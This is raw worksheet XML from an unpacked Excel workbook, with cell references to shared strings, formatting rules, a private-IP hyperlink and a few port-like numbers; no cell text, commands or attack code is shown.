      <c r="D8" t="s">
        <v>23</v>
      </c>
      <c r="E8" t="s">
        <v>110</v>
      </c>
      <c r="F8" s="1" t="s">
        <v>250</v>
      </c>
      <c r="H8" t="s">
        <v>109</v>
      </c>
      <c r="L8" s="3"/>
    </row>
    <row r="9" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>10</v>
      </c>
      <c r="C9" s="29" t="s">
        <v>251</v>
      </c>
      <c r="D9" t="s">
        <v>23</v>
      </c>
      <c r="E9" t="s">
        <v>112</v>
      </c>
      <c r="F9" t="s">
        <v>48</v>
      </c>
      <c r="H9" t="s">
        <v>109</v>
      </c>
      <c r="L9" s="3"/>
    </row>
    <row r="10" spans="1:12" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>11</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>253</v>
      </c>
      <c r="C10" s="29" t="s">
        <v>252</v>
      </c>
      <c r="E10" s="1" t="s">
        <v>113</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>255</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>254</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I10" s="1" t="s">
        <v>115</v>
      </c>
      <c r="L10" s="3"/>
    </row>
    <row r="11" spans="1:12" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>64</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>262</v>
      </c>
      <c r="C11" s="29" t="s">
        <v>263</v>
      </c>
      <c r="E11">
        <v>21</v>
      </c>
      <c r="F11" t="s">
        <v>81</v>
      </c>
      <c r="H11" t="s">
        <v>80</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>261</v>
      </c>
      <c r="K11" s="30" t="s">
        <v>264</v>
      </c>
      <c r="L11" s="3"/>
    </row>
    <row r="12" spans="1:12" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>13</v>
      </c>
      <c r="B12" t="s">
        <v>51</v>
      </c>
      <c r="D12" t="s">
        <v>25</v>
      </c>
      <c r="E12" s="1" t="s">
        <v>73</v>
      </c>
      <c r="F12">
        <v>5900</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>74</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>72</v>
      </c>
      <c r="J12">
        <v>1</v>
      </c>
      <c r="K12" s="1" t="s">
        <v>78</v>
      </c>
      <c r="L12" s="3"/>
    </row>
    <row r="13" spans="1:12" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>37</v>
      </c>
      <c r="C13" t="s">
        <v>266</v>
      </c>
      <c r="E13" t="s">
        <v>63</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>151</v>
      </c>
      <c r="G13" s="1"/>
      <c r="H13" s="1" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="14" spans="1:12" s="6" customFormat="1" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A14" s="6" t="s">
        <v>15</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>51</v>
      </c>
      <c r="C14" s="6" t="s">
        <v>117</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>116</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>29</v>
      </c>
      <c r="H14" s="7" t="s">
        <v>118</v>
      </c>
      <c r="I14" s="7" t="s">
        <v>144</v>
      </c>
      <c r="L14" s="8"/>
    </row>
    <row r="15" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>16</v>
      </c>
      <c r="C15" t="s">
        <v>119</v>
      </c>
      <c r="E15" t="s">
        <v>120</v>
      </c>
      <c r="F15" t="s">
        <v>49</v>
      </c>
      <c r="I15">
        <v>77</v>
      </c>
      <c r="L15" s="3"/>
    </row>
    <row r="16" spans="1:12" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>17</v>
      </c>
      <c r="C16" t="s">
        <v>122</v>
      </c>
      <c r="E16" s="1" t="s">
        <v>121</v>
      </c>
      <c r="F16" t="s">
        <v>123</v>
      </c>
      <c r="L16" s="3"/>
    </row>
    <row r="17" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>193</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" s="3"/>
    </row>
    <row r="18" spans="1:12" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>18</v>
      </c>
      <c r="C18" t="s">
        <v>146</v>
      </c>
      <c r="E18" s="1" t="s">
        <v>150</v>
      </c>
      <c r="F18" t="s">
        <v>29</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>241</v>
      </c>
      <c r="I18" t="s">
        <v>147</v>
      </c>
      <c r="L18" s="3"/>
    </row>
    <row r="19" spans="1:12" ht="72" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>177</v>
      </c>
      <c r="B19" t="s">
        <v>183</v>
      </c>
      <c r="C19" t="s">
        <v>179</v>
      </c>
      <c r="E19" t="s">
        <v>181</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>182</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>178</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="20" spans="1:12" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>19</v>
      </c>
      <c r="B20" t="s">
        <v>51</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E20" s="1" t="s">
        <v>55</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>60</v>
      </c>
      <c r="G20" s="1"/>
      <c r="H20" s="1" t="s">
        <v>54</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>59</v>
      </c>
      <c r="J20" s="1">
        <v>1</v>
      </c>
      <c r="K20" s="1" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="21" spans="1:12" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>20</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E21" s="1" t="s">
        <v>66</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>56</v>
      </c>
      <c r="G21" s="1"/>
      <c r="I21" s="1"/>
      <c r="L21" s="3"/>
    </row>
    <row r="22" spans="1:12" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>21</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>257</v>
      </c>
      <c r="C22" t="s">
        <v>256</v>
      </c>
      <c r="E22" t="s">
        <v>31</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G22" t="s">
        <v>259</v>
      </c>
      <c r="H22" s="1" t="s">
        <v>260</v>
      </c>
      <c r="J22">
        <v>1</v>
      </c>
      <c r="L22" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A1:XFD1 M2:XFD22 I14:K14 A2:K12 E13:K13 A17:K17 A23:XFD1048576 E15:K16 E14:G14 A13:C16 A20:K22 E18:K19 A18:C19">
    <cfRule type="expression" dxfId="9" priority="2">
      <formula>$J1=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L20">
    <cfRule type="expression" dxfId="8" priority="1">
      <formula>$J20=1</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="K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6" sqref="J6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="11.33203125" customWidth="1"/>
    <col min="5" max="5" width="10.77734375" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="28.6640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="22.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="12.5546875" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="9.6640625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="11.77734375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" x14ac:dyDescent="0.3">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>89</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>28</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>52</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>53</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>68</v>
      </c>
      <c r="J1" s="2" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2" spans="1:11" s="4" customFormat="1" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A2" s="4" t="s">
        <v>33</v>
      </c>
      <c r="B2" s="4" t="s">
        <v>102</v>
      </c>
      <c r="E2" s="4" t="s">
        <v>101</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>103</v>
      </c>
      <c r="G2" s="5" t="s">
        <v>94</v>
      </c>
      <c r="K2" s="9"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="L2:XFD2 A2:J2">
    <cfRule type="expression" dxfId="7" priority="2">
      <formula>$I2=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A1:XFD1">
    <cfRule type="expression" dxfId="6" priority="1">
      <formula>$I1=1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xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
      <selection activeCell="A8" sqref="A8"/>
      <selection pane="topRight" activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.109375" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.6640625" style="11" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="14.88671875" style="11" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="12.5546875" style="11" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="13.6640625" style="11" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="16.6640625" style="11" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="27.44140625" style="11" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="40" style="11" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="18.109375" style="11" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="9.6640625" style="11" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="32.5546875" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9.109375" style="11"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A1" s="10" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="10" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>89</v>
      </c>
      <c r="D1" s="10" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="10" t="s">
        <v>28</v>
      </c>
      <c r="F1" s="10" t="s">
        <v>52</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>53</v>
      </c>
      <c r="H1" s="10" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="10" t="s">
        <v>68</v>
      </c>
      <c r="J1" s="10" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2" spans="1:12" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A2" s="13" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>87</v>
      </c>
      <c r="C2" s="13" t="s">
        <v>91</v>
      </c>
      <c r="D2" s="13" t="s">
        <v>26</v>
      </c>
      <c r="E2" s="13" t="s">
        <v>157</v>
      </c>
      <c r="F2" s="13" t="s">
        <v>30</v>
      </c>
      <c r="G2" s="13" t="s">
        <v>158</v>
      </c>
      <c r="H2" s="13" t="s">
        <v>156</v>
      </c>
      <c r="I2" s="13">
        <v>1</v>
      </c>
      <c r="J2" s="13" t="s">
        <v>159</v>
      </c>
      <c r="K2" s="19"/>
    </row>
    <row r="3" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A3" s="11" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="11" t="s">
        <v>71</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>163</v>
      </c>
      <c r="D3" s="11" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="11" t="s">
        <v>61</v>
      </c>
      <c r="F3" s="11" t="s">
        <v>47</v>
      </c>
      <c r="H3" s="12" t="s">
        <v>79</v>
      </c>
      <c r="I3" s="11">
        <v>1</v>
      </c>
      <c r="J3" s="13" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="4" spans="1:12" s="20" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A4" s="20" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="20" t="s">
        <v>98</v>
      </c>
      <c r="C4" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D4" s="20" t="s">
        <v>26</v>
      </c>
      <c r="E4" s="20" t="s">
        <v>99</v>
      </c>
      <c r="F4" s="20" t="s">
        <v>46</v>
      </c>
      <c r="G4" s="20" t="s">
        <v>234</v>
      </c>
      <c r="H4" s="20" t="s">
        <v>235</v>
      </c>
      <c r="I4" s="20">
        <v>1</v>
      </c>
      <c r="J4" s="20" t="s">
        <v>236</v>
      </c>
      <c r="K4" s="21"/>
    </row>
    <row r="5" spans="1:12" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A5" s="13" t="s">
        <v>34</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>127</v>
      </c>
      <c r="C5" s="13" t="s">
        <v>166</v>
      </c>
      <c r="E5" s="13" t="s">
        <v>128</v>
      </c>
      <c r="F5" s="13" t="s">
        <v>45</v>
      </c>
      <c r="G5" s="13" t="s">
        <v>129</v>
      </c>
      <c r="I5" s="13">
        <v>1</v>
      </c>
      <c r="J5" s="13" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="11" t="s">
        <v>139</v>
      </c>
      <c r="B6" s="11" t="s">
        <v>98</v>
      </c>
      <c r="C6" s="11" t="s">
        <v>167</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>164</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>231</v>
      </c>
      <c r="G6" s="18" t="s">
        <v>232</v>
      </c>
      <c r="H6" s="12" t="s">
        <v>233</v>
      </c>
      <c r="J6" s="12"/>
    </row>
    <row r="7" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A7" s="11" t="s">
        <v>14</v>
      </c>
      <c r="B7" s="11" t="s">
        <v>76</v>
      </c>
      <c r="C7" s="11" t="s">
        <v>162</v>
      </c>
      <c r="D7" s="11" t="s">
        <v>26</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>75</v>
      </c>
      <c r="F7" s="11" t="s">
        <v>29</v>
      </c>
      <c r="H7" s="11" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="8" spans="1:12" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A8" s="13" t="s">
        <v>35</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>76</v>
      </c>
      <c r="C8" s="13" t="s">
        <v>92</v>
      </c>
      <c r="E8" s="13">
        <v>1</v>
      </c>
      <c r="F8" s="13" t="s">
        <v>83</v>
      </c>
      <c r="G8" s="13" t="s">
        <v>84</v>
      </c>
      <c r="H8" s="13" t="s">
        <v>85</v>
      </c>
      <c r="I8" s="13">
        <v>1</v>
      </c>
      <c r="J8" s="13" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A9" s="11" t="s">
        <v>27</v>
      </c>
      <c r="B9" s="11" t="s">
        <v>98</v>
      </c>
      <c r="E9" s="12" t="s">
        <v>131</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>130</v>
      </c>
      <c r="G9" s="11" t="s">
        <v>132</v>
      </c>
      <c r="J9" s="12" t="s">
        <v>138</v>
      </c>
    </row>
    <row r="10" spans="1:12" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A10" s="13" t="s">
        <v>12</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>137</v>
      </c>
      <c r="C10" s="13" t="s">
        <v>134</v>
      </c>
      <c r="E10" s="13" t="s">
        <v>133</v>
      </c>
      <c r="F10" s="13" t="s">
        <v>136</v>
      </c>
      <c r="G10" s="13" t="s">
        <v>135</v>
      </c>
      <c r="H10" s="13" t="s">
        <v>160</v>
      </c>
      <c r="I10" s="13">
        <v>1</v>
      </c>
      <c r="J10" s="13" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="11" spans="1:12" s="22" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A11" s="22" t="s">
        <v>36</v>
      </c>
      <c r="C11" s="22" t="s">
        <v>148</v>
      </c>
      <c r="E11" s="22" t="s">
        <v>145</v>
      </c>
      <c r="H11" s="22" t="s">
        <v>149</v>
      </c>
      <c r="I11" s="22">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:12" customFormat="1" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>168</v>
      </c>
      <c r="B12" s="25" t="s">
        <v>238</v>
      </c>
      <c r="C12" s="26" t="s">
        <v>240</v>
      </c>
      <c r="D12" s="26"/>
      <c r="E12" t="s">
        <v>169</v>
      </c>
      <c r="G12" s="25" t="s">
        <v>237</v>
      </c>
      <c r="H12" s="25" t="s">
        <v>239</v>
      </c>
      <c r="I12" s="26">
        <v>1</v>
      </c>
      <c r="J12" s="25" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="13" spans="1:12" customFormat="1" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A13">
        <v>146</v>
      </c>
      <c r="D13" s="11"/>
      <c r="E13" t="s">
        <v>65</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="14" spans="1:12" s="20" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A14" s="20" t="s">
        <v>38</v>
      </c>
      <c r="E14" s="20" t="s">
        <v>63</v>
      </c>
      <c r="F14" s="20" t="s">
        <v>45</v>
      </c>
      <c r="G14" s="20" t="s">
        <v>142</v>
      </c>
      <c r="H14" s="20" t="s">
        <v>143</v>
      </c>
      <c r="I14" s="20">
        <v>1</v>
      </c>
      <c r="K14" s="21"/>
    </row>
    <row r="15" spans="1:12" s="24" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A15" s="13" t="s">
        <v>39</v>
      </c>
      <c r="B15" s="13" t="s">
        <v>173</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13"/>
      <c r="E15" s="13" t="s">
        <v>171</v>
      </c>
      <c r="F15" s="13" t="s">
        <v>172</v>
      </c>
      <c r="G15" s="13" t="s">
        <v>174</v>
      </c>
      <c r="H15" s="13" t="s">
        <v>175</v>
      </c>
      <c r="I15" s="23">
        <v>1</v>
      </c>
      <c r="J15" s="13" t="s">
        <v>176</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13"/>
    </row>
    <row r="16" spans="1:12" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>40</v>
      </c>
      <c r="B16" t="s">
        <v>98</v>
      </c>
      <c r="D16" s="11" t="s">
        <v>194</v>
      </c>
      <c r="E16" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="17" spans="1:10" s="24" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A17" s="24" t="s">
        <v>41</v>
      </c>
      <c r="B17" s="24" t="s">
        <v>186</v>
      </c>
      <c r="C17" s="24" t="s">
        <v>188</v>
      </c>
      <c r="E17" s="24" t="s">
        <v>63</v>
      </c>
      <c r="F17" s="24" t="s">
        <v>184</v>
      </c>
      <c r="H17" s="17" t="s">
        <v>185</v>
      </c>
      <c r="I17" s="24">
        <v>1</v>
      </c>
      <c r="J17" s="24" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="18" spans="1:10" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>42</v>
      </c>
      <c r="B18"/>
      <c r="C18" t="s">
        <v>229</v>
      </c>
      <c r="E18" t="s">
        <v>189</v>
      </c>
      <c r="F18" s="12" t="s">
        <v>190</v>
      </c>
      <c r="G18" s="18" t="s">
        <v>191</v>
      </c>
      <c r="H18" s="12" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="19" spans="1:10" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A19" s="11" t="s">
        <v>43</v>
      </c>
      <c r="C19" s="11" t="s">
        <v>230</v>
      </c>
      <c r="E19" s="11" t="s">
        <v>189</v>
      </c>
      <c r="F19" s="12" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="20" spans="1:10" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A20" s="24" t="s">
        <v>44</v>
      </c>
      <c r="B20" s="17" t="s">
        <v>196</v>
      </c>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24" t="s">
        <v>67</v>
      </c>
      <c r="F20" s="13" t="s">
        <v>195</v>
      </c>
      <c r="G20" s="13" t="s">
        <v>197</v>
      </c>
      <c r="I20" s="13">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A21" s="11" t="s">
        <v>198</v>
      </c>
      <c r="E21" s="11">
        <v>22</v>
      </c>
    </row>
    <row r="22" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A22" s="11" t="s">
        <v>199</v>
      </c>
      <c r="E22" s="11" t="s">
        <v>200</v>
      </c>
      <c r="F22" s="11" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="23" spans="1:10" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A23" s="11" t="s">
        <v>202</v>
      </c>
      <c r="E23" s="11" t="s">
        <v>204</v>
      </c>
      <c r="F23" s="12" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="24" spans="1:10" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A24" s="11" t="s">
        <v>203</v>
      </c>
      <c r="C24" s="11" t="s">
        <v>211</v>
      </c>
      <c r="E24" s="12" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="25" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A25" s="11" t="s">
        <v>206</v>
      </c>
      <c r="C25" s="11" t="s">
        <v>209</v>
      </c>
      <c r="E25" s="11">
        <v>3389</v>
      </c>
    </row>
    <row r="26" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A26" s="11" t="s">
        <v>210</v>
      </c>
      <c r="C26" s="11" t="s">
        <v>208</v>
      </c>
      <c r="E26" s="11" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="27" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A27" s="11" t="s">
        <v>207</v>
      </c>
      <c r="C27" s="11" t="s">
        <v>212</v>
      </c>
      <c r="E27" s="11" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="28" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A28" s="11" t="s">
        <v>215</v>
      </c>
      <c r="C28" s="11" t="s">
        <v>216</v>
      </c>
      <c r="E28" s="11">
        <v>3389</v>
      </c>
    </row>
    <row r="29" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A29" s="11" t="s">
        <v>217</v>
      </c>
      <c r="C29" s="11" t="s">
        <v>218</v>
      </c>
      <c r="E29" s="11" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="30" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A30" s="11" t="s">
        <v>220</v>
      </c>
      <c r="C30" s="11" t="s">
        <v>221</v>
      </c>
      <c r="E30" s="11" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="31" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A31" s="11" t="s">
        <v>222</v>
      </c>
      <c r="C31" s="11" t="s">
        <v>223</v>
      </c>
      <c r="E31" s="11">
        <v>3389</v>
      </c>
    </row>
    <row r="32" spans="1:10" x14ac:dyDescent="0.3">
      <c r="A32" s="11" t="s">
        <v>227</v>
      </c>
      <c r="C32" s="11" t="s">
        <v>224</v>
      </c>
      <c r="E32" s="11">
        <v>3389</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A33" s="11" t="s">
        <v>225</v>
      </c>
      <c r="E33" s="11" t="s">
        <v>226</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A1:XFD11 A12:C13 E12:XFD12 A14:XFD14 F13:XFD13 A19:XFD19 H15:XFD15 A15:C18 E16:XFD18 A21:XFD22 A20:C20 E20:XFD20 A25:XFD1048576 A23:D24 F23:XFD24">
    <cfRule type="expression" dxfId="5" priority="5">
      <formula>$I1=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D15:G15">
    <cfRule type="expression" dxfId="4" priority="4">
      <formula>$I15=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D17">
    <cfRule type="expression" dxfId="3" priority="3">
      <formula>$I17=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D20">
    <cfRule type="expression" dxfId="2" priority="2">
      <formula>$I20=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23">
    <cfRule type="expression" dxfId="1" priority="7">
      <formula>$I24=1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D12">
    <cfRule type="expression" dxfId="0" priority="1">
      <formula>$I12=1</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="G18" r:id="rId1"/>
    <hyperlink ref="G6" r:id="rId2" display="https://10.11.1.44:8000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</vt:lpstr>
      <vt:lpstr>MacOS</vt:lpstr>
      <vt:lpstr>Linux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Diana (HQP)</dc:creator>
  <cp:lastModifiedBy>Wong, Diana (HQP)</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-07T22:14:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-27T20:13:10Z</dcterms:modified>
</cp:coreProperties>
</file>